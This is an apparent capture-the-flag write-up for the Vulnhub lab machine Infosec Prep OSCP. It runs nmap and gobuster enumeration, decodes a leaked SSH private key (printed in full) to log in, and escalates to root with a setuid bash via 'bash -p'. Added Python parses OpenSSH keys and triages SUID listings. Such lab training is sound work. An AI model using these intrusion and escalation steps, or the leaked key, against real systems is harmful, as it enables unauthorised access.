[VULNHUB] INFOSEC PREP OSCP

Today we are going to hack the Vulnhub machine called Infosec Prep OSCP. You can download it from the following link: https://www.vulnhub.com/entry/infosec-prep-oscp,508/
  • Enumeration
  • We start with an nmap scan of every TCP port (-p-) with version detection and default scripts (-A) to see what is open.
    ~ > nmap -A -p- 192.168.1.24
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-16 20:13 CEST
    Nmap scan report for oscp.home (192.168.1.24)
    Host is up (0.00024s latency).
    Not shown: 65532 closed ports
    PORT      STATE SERVICE VERSION
    22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
    80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
    |_http-generator: WordPress 5.4.2
    | http-robots.txt: 1 disallowed entry
    |_/secret.txt
    |_http-server-header: Apache/2.4.41 (Ubuntu)
    |_http-title: OSCP Voucher – Just another WordPress site
    33060/tcp open  mysqlx?
    | fingerprint-strings:
    |   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
    |     Invalid message"
    |_    HY000
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port33060-TCP:V=7.80%I=7%D=7/16%Time=5F1098DD%P=x86_64-pc-linux-gnu%r(N
    SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\
    SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp
    SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b
    SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers
    SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2
    SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI
    SF:nvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
    SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01
    SF:\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie
    SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x
    SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
    SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9
    SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\
    SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0
    SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,
    SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0
    SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
    SF:x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions
    SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x
    SF:05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"
    SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1
    SF:a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000
    SF:")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0
    SF:\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r
    SF:(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x0
    SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
    SF:x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 25.01 seconds
    Three ports: SSH, an Apache/WordPress site whose robots.txt points at /secret.txt, and 33060, which is the MySQL X Protocol (mysqlx) port that this nmap release only half-recognizes. Port 80 is the obvious place to dig, so we brute-force paths on it.
    ~ > gobuster dir -u http://192.168.1.24 -w /usr/share/wordlists/dirb/big.txt -x txt,php
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://192.168.1.24
    [+] Threads:        10
    [+] Wordlist:       /usr/share/wordlists/dirb/big.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Extensions:     txt,php
    [+] Timeout:        10s
    ===============================================================
    2020/07/16 20:16:04 Starting gobuster
    ===============================================================
    /.htaccess (Status: 403)
    /.htaccess.txt (Status: 403)
    /.htaccess.php (Status: 403)
    /.htpasswd (Status: 403)
    /.htpasswd.txt (Status: 403)
    /.htpasswd.php (Status: 403)
    /index.php (Status: 301)
    /javascript (Status: 301)
    /license.txt (Status: 200)
    /robots.txt (Status: 200)
    /robots.txt (Status: 200)
    /secret.txt (Status: 200)
    /server-status (Status: 403)
    /wp-admin (Status: 301)
    /wp-content (Status: 301)
    /wp-includes (Status: 301)
    /wp-config.php (Status: 200)
    /wp-login.php (Status: 200)
    /wp-trackback.php (Status: 200)
    ===============================================================
    2020/07/16 20:16:13 Finished
    ===============================================================
    We see there is a file called secret.txt, the same one robots.txt disallows: http://192.168.1.24/secret.txt. Opening it, the content looks like base64. We fetch it with curl and decode the base64 in the same pipeline (the -v chatter goes to stderr, so only the response body reaches base64 -d).
    ~ > curl -v "http://192.168.1.24/secret.txt" | base64 -d
    *   Trying 192.168.1.24:80...
    * TCP_NODELAY set
      % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                     Dload  Upload   Total   Spent    Left  Speed
      0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0* Connected to 192.168.1.24 (192.168.1.24) port 80 (#0)
    > GET /secret.txt HTTP/1.1
    > Host: 192.168.1.24
    > User-Agent: curl/7.68.0
    > Accept: */*
    >
    * Mark bundle as not supporting multiuse
    < HTTP/1.1 200 OK
    < Date: Sat, 08 Aug 2020 09:29:28 GMT
    < Server: Apache/2.4.41 (Ubuntu)
    < Last-Modified: Thu, 09 Jul 2020 06:48:34 GMT
    < ETag: "dae-5a9fc9d02e4f6"
    < Accept-Ranges: bytes
    < Content-Length: 3502
    < Vary: Accept-Encoding
    < Content-Type: text/plain
    <
    { [3502 bytes data]
    100  3502  100  3502    0     0   427k      0 --:--:-- --:--:-- --:--:--  488k
    * Connection #0 to host 192.168.1.24 left intact
    -----BEGIN OPENSSH PRIVATE KEY-----
    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
    8nfK2oDc6LfrDmjQAAAAlvc2NwQG9zY3A=
    -----END OPENSSH PRIVATE KEY-----
    The decoded data is an OpenSSH private key. We copy it to our machine as id_rsa and give it the permissions ssh requires (it refuses a key that is readable by other users).
    ~ > chmod 600 id_rsa
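The steps above (decode secret.txt, check what came out, save it with the right mode, and work out which user to log in as) as an added example in Python; this is not code from the original write-up. It parses the openssh-key-v1 container directly, which is where the key comment lives: the key served by this box ends in the comment oscp@oscp, so the username does not have to be guessed. The sample key the block builds is a constructed fixture with dummy RSA numbers, not the key from the machine; only the container layout is real, and the same parser runs unchanged on the real id_rsa.

```python
"""Decode secret.txt, confirm it is an OpenSSH private key, save it with
mode 0600 and read the comment (user@host) out of the key container.
Added example; the sample key is a constructed fixture, not the real key."""
import base64
import os
import stat
import struct
import tempfile

PEM_BEGIN = b"-----BEGIN OPENSSH PRIVATE KEY-----"
PEM_END = b"-----END OPENSSH PRIVATE KEY-----"
MAGIC = b"openssh-key-v1\0"
# Key-specific fields between the key type and the comment in the private
# section (OpenSSH PROTOCOL.key); RSA stores n, e, d, iqmp, p, q.
PRIVATE_FIELDS = {"ssh-rsa": 6, "ssh-ed25519": 2, "ecdsa-sha2-nistp256": 3,
                  "ecdsa-sha2-nistp384": 3, "ecdsa-sha2-nistp521": 3}


def _string(b):                       # SSH "string": uint32 length + bytes
    return struct.pack(">I", len(b)) + b


def _read_string(buf, off):           # returns (value, offset after it)
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n


def decode_secret(text):
    """secret.txt is base64 of the PEM: strip whitespace, decode, check."""
    pem = base64.b64decode("".join(text.split()))
    if not pem.lstrip().startswith(PEM_BEGIN):
        raise ValueError("decoded data is not an OpenSSH private key")
    return pem


def openssh_key_info(pem):
    """Parse the openssh-key-v1 container: cipher, kdf, key type and, for an
    unencrypted key, the comment; for an encrypted one the comment is None."""
    body = b"".join(ln for ln in pem.splitlines() if ln and not ln.startswith(b"-----"))
    blob = base64.b64decode(body)
    if not blob.startswith(MAGIC):
        raise ValueError("missing openssh-key-v1 magic")
    cipher, off = _read_string(blob, len(MAGIC))
    kdf, off = _read_string(blob, off)
    _kdfopts, off = _read_string(blob, off)
    (nkeys,) = struct.unpack_from(">I", blob, off)
    pub, off = _read_string(blob, off + 4)
    ktype = _read_string(pub, 0)[0].decode()
    info = {"cipher": cipher.decode(), "kdf": kdf.decode(), "keys": nkeys,
            "type": ktype, "comment": None}
    if cipher != b"none" or ktype not in PRIVATE_FIELDS:
        return info                   # needs a passphrase, or unknown type
    priv = _read_string(blob, off)[0]
    _t, p = _read_string(priv, 8)     # 8: skip the two checkint words
    for _ in range(PRIVATE_FIELDS[ktype]):
        _field, p = _read_string(priv, p)
    info["comment"] = _read_string(priv, p)[0].decode(errors="replace")
    return info


def save_key(pem, directory, name="id_rsa"):
    """Write the key with mode 0600; ssh refuses group/world-readable keys."""
    path = os.path.join(directory, name)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(pem)
    os.chmod(path, 0o600)             # O_CREAT mode is subject to umask
    return path


def build_sample_key(comment="oscp@oscp", encrypted=False):
    """Constructed fixture: dummy RSA numbers, NOT a usable key. The default
    comment is the one found at the end of the key served by this box."""
    n, e = b"\x00\xc3" * 8, b"\x01\x00\x01"
    pub = _string(b"ssh-rsa") + _string(e) + _string(n)
    priv = struct.pack(">II", 0x1234, 0x1234) + _string(b"ssh-rsa")
    for field in (n, e, b"\x05", b"\x06", b"\x07", b"\x08"):
        priv += _string(field)
    priv += _string(comment.encode())
    priv += bytes(range(1, (-len(priv)) % 8 + 1))   # pad 1,2,3.. to 8 bytes
    if encrypted:                     # ciphertext stand-in: comment unreadable
        hdr = _string(b"aes256-ctr") + _string(b"bcrypt") + _string(b"\x00" * 20)
        priv = bytes(b ^ 0x5A for b in priv)
    else:
        hdr = _string(b"none") + _string(b"none") + _string(b"")
    blob = MAGIC + hdr + struct.pack(">I", 1) + _string(pub) + _string(priv)
    b64 = base64.b64encode(blob)
    lines = [b64[i:i + 70] for i in range(0, len(b64), 70)]
    return b"\n".join([PEM_BEGIN, *lines, PEM_END]) + b"\n"


def make_secret_txt(pem):
    """What secret.txt looks like: the PEM wrapped in a second base64 layer."""
    return base64.b64encode(pem).decode()


def demo():
    """The whole chain on the fixture, offline; returns key info plus file mode."""
    pem = decode_secret(make_secret_txt(build_sample_key()))
    info = openssh_key_info(pem)
    with tempfile.TemporaryDirectory() as d:
        info["mode"] = stat.S_IMODE(os.stat(save_key(pem, d)).st_mode)
    return info
```

On the real file, openssh_key_info(open("id_rsa", "rb").read()) reports type ssh-rsa, cipher none and comment oscp@oscp, which is the same thing ssh-keygen -y -f id_rsa prints after the public key. A key whose cipher is anything other than none is passphrase-protected: the comment comes back as None and the key is useless until the passphrase is recovered (ssh2john and john are the usual route).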
  • Low Shell
  • We log in as the user oscp with the key we found. The username oscp was obtained by "trying" users; the key also gives it away on its own, since an unencrypted OpenSSH private key stores its comment in clear and ssh-keygen -y -f id_rsa prints it after the public key (here it is oscp@oscp).
    ~ > ssh oscp@192.168.1.24 -i id_rsa
    The authenticity of host '192.168.1.24 (192.168.1.24)' can't be established.
    ECDSA key fingerprint is SHA256:j6pDoPWkkeKgplTqHPtxSxrMqrQRMPl5AIW2Lfn14y8.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '192.168.1.24' (ECDSA) to the list of known hosts.
    Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)

     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage

      System information as of Thu 16 Jul 2020 06:35:44 PM UTC

      System load:  0.42               Processes:             205
      Usage of /:   26.3% of 19.56GB   Users logged in:       0
      Memory usage: 58%                IPv4 address for eth0: 192.168.1.24
      Swap usage:   0%                 IPv6 address for eth0: 2a01:c50e:21e3:0:a00:27ff:fe1c:7753

    0 updates can be installed immediately.
    0 of these updates are security updates.

    The list of available updates is more than a week old.
    To check for new updates run: sudo apt update

    Last login: Sat Jul 11 16:50:11 2020 from 192.168.128.1
    -bash-5.0$
    We're in! We list the SUID files to see whether any of them is interesting.
  • Privilege Escalation
  • -bash-5.0$ find / -perm -4000 2>/dev/null
    /snap/snapd/8542/usr/lib/snapd/snap-confine
    /snap/snapd/8140/usr/lib/snapd/snap-confine
    /snap/core18/1885/bin/mount
    /snap/core18/1885/bin/ping
    /snap/core18/1885/bin/su
    /snap/core18/1885/bin/umount
    /snap/core18/1885/usr/bin/chfn
    /snap/core18/1885/usr/bin/chsh
    /snap/core18/1885/usr/bin/gpasswd
    /snap/core18/1885/usr/bin/newgrp
    /snap/core18/1885/usr/bin/passwd
    /snap/core18/1885/usr/bin/sudo
    /snap/core18/1885/usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /snap/core18/1885/usr/lib/openssh/ssh-keysign
    /snap/core18/1754/bin/mount
    /snap/core18/1754/bin/ping
    /snap/core18/1754/bin/su
    /snap/core18/1754/bin/umount
    /snap/core18/1754/usr/bin/chfn
    /snap/core18/1754/usr/bin/chsh
    /snap/core18/1754/usr/bin/gpasswd
    /snap/core18/1754/usr/bin/newgrp
    /snap/core18/1754/usr/bin/passwd
    /snap/core18/1754/usr/bin/sudo
    /snap/core18/1754/usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /snap/core18/1754/usr/lib/openssh/ssh-keysign
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/snapd/snap-confine
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/policykit-1/polkit-agent-helper-1
    /usr/lib/openssh/ssh-keysign
    /usr/bin/gpasswd
    /usr/bin/mount
    /usr/bin/fusermount
    /usr/bin/passwd
    /usr/bin/newgrp
    /usr/bin/at
    /usr/bin/sudo
    /usr/bin/chfn
    /usr/bin/bash
    /usr/bin/pkexec
    /usr/bin/umount
    /usr/bin/chsh
    /usr/bin/su
    /usr/bin/bash is in the list, and bash is not setuid on a stock Ubuntu install. A setuid-root bash is root for the taking: when its effective uid differs from the real uid, bash drops back to the real one unless it is started with -p (privileged mode), so /usr/bin/bash -p keeps euid 0 :)
    -bash-5.0$ /usr/bin/bash -p
    bash-5.0# id
    uid=1000(oscp) gid=1000(oscp) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd),1000(oscp)
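The SUID triage above as an added example in Python, not code from the original write-up: it parses a find listing like the one on this page, flags setuid programs that hand out a shell, diffs the rest against a baseline, and includes a live scanner equivalent to find -xdev -type f -perm -4000. The shell list and the baseline are assumptions built from this page's own listing (a stock Ubuntu 20.04 does not ship a setuid /usr/bin/bash), not an authoritative package manifest; the sample listing is copied from the page with the snap entries abbreviated, and the scanner's temp-directory check is constructed.

```python
"""SUID triage: parse `find / -perm -4000` output, flag setuid shells,
diff the rest against a baseline, and scan a tree live. Added example;
SHELLS and BASELINE are assumptions derived from this page's listing."""
import os
import stat
import tempfile

# Programs that give a root shell or arbitrary code when setuid root
# (bash -p, sh, interpreters, GTFOBins-style editors). Assumed list.
SHELLS = {"bash", "sh", "dash", "zsh", "ksh", "perl", "ruby", "env",
          "find", "vim", "vi", "nano", "less", "more", "awk", "nmap"}

# Setuid files expected on a stock Ubuntu 20.04 box. Assumed baseline, built
# from this page's listing minus the planted /usr/bin/bash; a real audit
# generates it from a clean install of the same release.
BASELINE = {
    "/usr/bin/at", "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/fusermount",
    "/usr/bin/gpasswd", "/usr/bin/mount", "/usr/bin/newgrp", "/usr/bin/passwd",
    "/usr/bin/pkexec", "/usr/bin/su", "/usr/bin/sudo", "/usr/bin/umount",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/policykit-1/polkit-agent-helper-1", "/usr/lib/snapd/snap-confine",
}

# Copied from the find output on this page (snap entries abbreviated).
SAMPLE_FIND_OUTPUT = """\
/snap/core18/1885/bin/su
/snap/core18/1885/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/bash
/usr/bin/pkexec
/usr/bin/umount
/usr/bin/chsh
/usr/bin/su
"""


def parse_find_output(text):
    """One path per line; /snap/... images carry read-only copies of the
    usual binaries and are dropped so they do not drown out the real ones."""
    paths = [ln.strip() for ln in text.splitlines()]
    return [p for p in paths if p.startswith("/") and not p.startswith("/snap/")]


def triage(paths):
    """Bucket setuid paths: 'shell' = root right away, 'unexpected' = not in
    the baseline (inspect by hand), 'expected' = stock."""
    out = {"shell": [], "unexpected": [], "expected": []}
    for p in sorted(set(paths)):
        name = os.path.basename(p)
        if name in SHELLS or name.startswith("python"):
            out["shell"].append(p)
        elif p in BASELINE:
            out["expected"].append(p)
        else:
            out["unexpected"].append(p)
    return out


def scan_suid(root):
    """Live equivalent of find ROOT -xdev -type f -perm -4000 (lstat based,
    so symlinks are never followed and unreadable entries are skipped)."""
    found, dev = [], os.lstat(root).st_dev
    for dirpath, dirnames, filenames in os.walk(root):
        keep = []
        for d in dirnames:                    # -xdev: stay on one filesystem
            try:
                if os.lstat(os.path.join(dirpath, d)).st_dev == dev:
                    keep.append(d)
            except OSError:
                pass
        dirnames[:] = keep
        for f in filenames:
            p = os.path.join(dirpath, f)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(p)
    return sorted(found)


def demo_scan():
    """Constructed check: two scripts in a temp dir, one with the setuid bit."""
    with tempfile.TemporaryDirectory() as d:
        for name, mode in (("plain_bin", 0o755), ("suid_bin", 0o4755)):
            with open(os.path.join(d, name), "wb") as fh:
                fh.write(b"#!/bin/sh\nid\n")
            os.chmod(os.path.join(d, name), mode)
        return [os.path.basename(p) for p in scan_suid(d)]
```

triage(parse_find_output(SAMPLE_FIND_OUTPUT)) puts /usr/bin/bash alone in the shell bucket and everything else under expected, which is exactly the signal the walkthrough acted on. Anything that lands in unexpected is only a lead: the setuid bit buys nothing unless the file is owned by root, so check ownership with ls -l before spending time on it.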
  • flag.txt
  • bash-5.0# cd /root
    bash-5.0# ls
    fix-wordpress  flag.txt  snap
    bash-5.0# cat flag.txt
    d73b04b0e696b0945283defa3eee4538
  • End
  • And with that we are root on the machine. The id output above also shows oscp in the sudo and lxd groups, two other classic escalation routes worth checking on a box that does not hand you a setuid shell.